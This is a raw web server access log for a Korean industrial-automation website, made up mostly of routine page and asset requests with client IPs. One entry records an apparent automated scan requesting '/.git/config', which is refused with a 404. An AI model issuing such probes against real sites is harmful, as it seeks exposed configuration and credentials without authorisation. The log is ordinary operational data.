Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:34:38 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10028] [Gzip 5.06] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:06:34:38 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:34:38 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:34:38 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:34:38 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:34:38 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:34:38 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 18126] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:34:38 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:34:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:36:06 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10028] [Gzip 5.06] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:06:36:06 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:36:06 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:36:06 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:36:06 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:36:06 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:36:06 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 18111] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:36:06 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:36:06 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:37:05 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10028] [Gzip 5.06] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:06:37:05 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:37:05 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:37:05 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:37:05 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:37:05 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:37:05 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 18119] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:37:05 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:37:05 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:41:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10028] [Gzip 5.06] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:06:41:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:41:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:41:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:41:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:41:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:41:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 18111] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:41:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:41:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:08:18:48 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.git/config" [Client 45.148.10.238] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "Mozilla/4.8 [en] (X11; U; SunOS; 5.7 sun4u)" "-" -[16/Feb/2026:08:40:37 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10011] [Gzip 5.07] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:08:40:37 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:08:40:37 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:08:40:37 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:08:40:37 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:08:40:37 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:08:40:37 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1687158] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:08:40:37 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 18111] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:08:40:37 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:08:40:38 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:08:50:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10011] [Gzip 5.07] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:08:50:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:08:50:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:08:50:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:08:50:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:08:50:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1439422] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:08:50:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:08:50:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 18111] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:08:50:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:08:50:02 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:08:52:21 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10011] [Gzip 5.07] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:08:52:21 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:08:52:21 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:08:52:21 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:08:52:21 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:08:52:22 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:08:52:22 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:08:52:22 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 18111] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:08:52:22 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:08:52:22 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:08:55:37 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 211.234.204.1] [Length 10011] [Gzip 5.07] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" -[16/Feb/2026:08:55:37 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:08:55:37 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:08:55:37 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 211.234.204.1] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:08:55:37 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 211.234.204.1] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:08:55:38 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 211.234.204.1] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:08:55:38 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 211.234.204.1] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:08:55:38 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 211.234.204.1] [Length 18111] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:08:55:38 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:08:57:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10011] [Gzip 5.07] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[16/Feb/2026:08:57:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" 